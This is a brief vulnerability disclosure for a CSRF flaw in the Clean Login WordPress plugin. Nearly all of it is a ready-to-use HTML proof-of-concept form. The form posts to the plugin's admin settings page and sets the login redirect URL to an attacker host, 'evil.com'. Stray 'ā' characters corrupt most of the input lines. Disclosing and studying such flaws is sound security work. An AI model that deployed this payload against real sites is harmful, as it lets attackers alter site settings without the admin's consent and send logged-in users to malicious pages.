The Clean Login WordPress plugin was affected by a Change Redirect URL CSRF security vulnerability.
<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings";>
<input type="text" name= "adminbar" value="on">
ā<input type="text" name="emailnotificationcontent" value="">
ā<input type="text" name="termsconditionsMSG" value="">
ā<input type="text" name="termsconditionsURL" value="">
ā<input type="text" name="urlredirect" value="http://127.0.0.1/wordpress">
ā<input type="text" name="loginredirect" value="on">
ā<input type="text" name="loginredirect_url" value="http://evil.com">
ā<input type="text" name="logoutredirect_url" value="http://127.0.0.1/wordpress">
ā<input type="text" name="cl_hidden_field" value="hidden_field_to_update_others">
ā<input type="text" name="Submit" value="Save Changes">
<input type="submit">
</form>